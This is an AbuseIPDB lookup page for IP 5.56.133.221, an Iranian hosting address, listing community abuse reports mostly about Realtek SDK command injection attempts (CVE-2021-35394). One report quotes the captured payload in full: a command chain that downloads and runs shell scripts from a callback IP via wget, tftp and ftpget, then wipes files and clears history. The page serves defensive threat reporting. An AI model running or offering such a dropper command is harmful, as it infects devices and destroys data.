JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 5.56.133.221

5.56.133.221 was found in our database!

This IP was reported 23 times. Confidence of Abuse is 0%: ?

ISP	Aria Web Development LLC
Usage Type	Data Center/Web Hosting/Transit
ASN	AS51026
Domain Name	ariawebco.net
Country	🇮🇷 Iran (Islamic Republic of)
City	Tehran, Tehran

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 5.56.133.221

Whois 5.56.133.221

IP Abuse Reports for 5.56.133.221:

This IP address has been reported a total of 23 times from 15 distinct sources. 5.56.133.221 was first reported on October 18th 2023, and the most recent report was 1 year ago.

Old Reports: The most recent abuse report for this IP address is from 1 year ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇧🇾 StatsMe	2024-12-20 21:18:28 (1 year ago)	2024-12-20T06:34:36.915609+0300 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound ( ... show more 2024-12-20T06:34:36.915609+0300 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking Exploited Host Web App Attack
🇨🇿 0x44	2024-12-20 04:14:00 (1 year ago)	EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) {UDP}	Port Scan Hacking
🇺🇸 AFSI	2024-12-20 03:42:05 (1 year ago)	Attempted User Privilege Gain (Initial Access > Exploit Public-Facing Application 1:58853 - SERVER- ... show more Attempted User Privilege Gain (Initial Access > Exploit Public-Facing Application 1:58853 - SERVER-OTHER RealTek UDPServer command injection attempt) show less	Port Scan Hacking
Anonymous	2024-12-20 01:19:09 (1 year ago)	Blocked by UFW (UDP on 9034) Source port: 50982 TTL: 241 Packet length: 424 404 TOS: 0x14 This repo ... show more Blocked by UFW (UDP on 9034) Source port: 50982 TTL: 241 Packet length: 424 404 TOS: 0x14 This report (for 5.56.133.221) was generated by: https://github.com/sefinek/UFW-AbuseIPDB-Reporter show less	Port Scan
🇮🇩 penjaga BRIN	2024-12-19 23:44:22 (1 year ago)	Realtek.SDK.UDPServer.Command.Execution	Web App Attack
🇧🇾 StatsMe	2024-12-19 21:17:57 (1 year ago)	2024-12-19T15:47:18.251300+0300 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound ( ... show more 2024-12-19T15:47:18.251300+0300 ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394) show less	Hacking Exploited Host Web App Attack
🇺🇸 AFSI	2024-12-19 20:12:54 (1 year ago)	(Initial Access > Exploit Public-Facing Application 1:58853 - SERVER-OTHER RealTek UDPServer comman ... show more (Initial Access > Exploit Public-Facing Application 1:58853 - SERVER-OTHER RealTek UDPServer command injection attempt) show less	Port Scan Hacking
🇩🇪 smopdidi	2024-12-19 20:02:02 (1 year ago)	Ports: 9034; 2 attempts	Port Scan
🇩🇪 smopdidi	2024-12-19 16:52:07 (1 year ago)	Ports: 9034; 2 attempts	Port Scan
🇮🇳 Mr.Singh	2024-12-19 15:30:34 (1 year ago)	NFT blocked 5.56.133.221 on 19-Dec-2024..	Port Scan Brute-Force
🇮🇪 RoboSOC	2024-12-19 14:40:09 (1 year ago)	Realtek Jungle SDK Remote Code Execution Vulnerability, PTR: 5-56-133-221.static.karizanta.com.	Hacking
🇺🇸 HarbertsT	2024-12-19 14:19:00 (1 year ago)	udp/9034 RealTek UDPServer cmd injection attempt Source IP: 5.56.133.221 Callback IP: 5.56.133.94 ... show more udp/9034 RealTek UDPServer cmd injection attempt Source IP: 5.56.133.221 Callback IP: 5.56.133.94 orf; cd /tmp cd /var/run cd /mnt cd /root cd /; wget http://5.56.133.94/bins.sh; chmod 777 bins.sh; sh bins.sh; tftp 5.56.133.94 -c get tftp1.sh; chmod 777 tftp1.sh; sh tftp1.sh; tftp -r tftp2.sh -g 5.56.133.94; chmod 777 tftp2.sh; sh tftp2.sh; ftpget -v -u anonymous -p anonymous -P 21 5.56.133.94 ftp1.sh ftp1.sh; sh ftp1.sh; rm -rf bins.sh tftp1.sh tftp2.sh ftp1.sh; rm -rf *; history -c; show less	Hacking Web App Attack
🇺🇸 AFSI	2024-12-19 13:01:18 (1 year ago)	(1:58853:SERVER-OTHER RealTek UDPServer command injection attempt)	Port Scan Hacking
🇹🇭 MWA SOC	2024-12-19 12:45:51 (1 year ago)		Hacking
🇫🇷 vincent_EUDIER	2024-12-19 12:40:00 (1 year ago)	ET EXPLOIT Realtek SDK - Command Execution/Backdoor Access Inbound (CVE-2021-35394)	Hacking

Showing 1 to 15 of 23 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇨🇳 220.154.134.180

🇨🇴 201.184.50.251

🇦🇹 152.53.33.156

🇭🇰 144.48.8.10

🇨🇳 120.229.30.6

🇮🇷 94.101.184.110

🇳🇱 91.92.40.10

🇺🇸 66.132.172.111

🇳🇱 45.156.128.15

🇸🇪 41.216.182.77

🇭🇰 8.218.29.146

🇬🇧 2a06:4880:8000::a7

🇦🇺 223.27.18.80

🇵🇫 148.66.71.73

🇨🇳 110.152.114.107

🇮🇩 103.167.11.224

🇺🇸 69.10.63.170

🇨🇿 46.135.100.183

🇩🇪 45.8.68.2

🇺🇸 23.254.197.165